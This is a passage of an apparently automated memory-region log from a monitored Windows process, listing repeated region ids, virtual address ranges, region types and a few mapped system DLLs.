pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22347 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22348 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22349 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22350 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22351 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22352 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22353 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22354 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22355 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22356 start_va = 0x1ea0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 22357 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22358 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 22359 start_va = 0x1ea0000 end_va = 0x1eaefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 22360 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22362 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22363 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22375 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22376 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22377 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22378 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22379 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22380 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22381 start_va = 0x7ffa03fb0000 end_va = 0x7ffa04063fff monitored = 0 entry_point = 0x7ffa03fc53b0 region_type = mapped_file name = "windows.internal.shell.broker.dll" filename = "\\Windows\\System32\\Windows.Internal.Shell.Broker.dll" (normalized: "c:\\windows\\system32\\windows.internal.shell.broker.dll") Region: id = 22382 start_va = 0x107f0000 end_va = 0x1086ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000107f0000" filename = "" Region: id = 22383 start_va = 0x7ff7d4180000 end_va = 0x7ff7d494bfff monitored = 0 entry_point = 0x7ff7d4519010 region_type = mapped_file name = "ntoskrnl.exe" filename = "\\Windows\\System32\\ntoskrnl.exe" (normalized: "c:\\windows\\system32\\ntoskrnl.exe") Region: id = 22384 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22385 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22386 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22387 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22389 start_va = 0x10870000 end_va = 0x108effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010870000" filename = "" Region: id = 22390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22407 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 22408 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22409 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22410 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22414 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22415 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22416 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22423 start_va = 0x108f0000 end_va = 0x1096ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000108f0000" filename = "" Region: id = 22424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22433 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22449 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22451 start_va = 0x8430000 end_va = 0x8568fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008430000" filename = "" Region: id = 22452 start_va = 0x85a0000 end_va = 0x85affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085a0000" filename = "" Region: id = 22453 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 22454 start_va = 0x1ea0000 end_va = 0x1ea3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 22455 start_va = 0x49d0000 end_va = 0x49f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049d0000" filename = "" Region: id = 22456 start_va = 0x4a00000 end_va = 0x4a21fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 22457 start_va = 0x9270000 end_va = 0x93a8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009270000" filename = "" Region: id = 22458 start_va = 0x10970000 end_va = 0x109effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010970000" filename = "" Region: id = 22459 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 22460 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22461 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22462 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22463 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22464 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22465 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22466 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22467 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22468 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22469 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22470 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22471 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22472 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22473 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22474 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22475 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22476 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22477 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22478 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22479 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22480 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22481 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22482 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22483 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22484 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22485 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22486 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22487 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22488 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22489 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22490 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22491 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22492 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22494 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22495 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22496 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22497 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22498 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22500 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22501 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22502 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22503 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22504 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22505 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22509 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22510 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22529 start_va = 0x109f0000 end_va = 0x10a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000109f0000" filename = "" Region: id = 22530 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22531 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 22532 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" 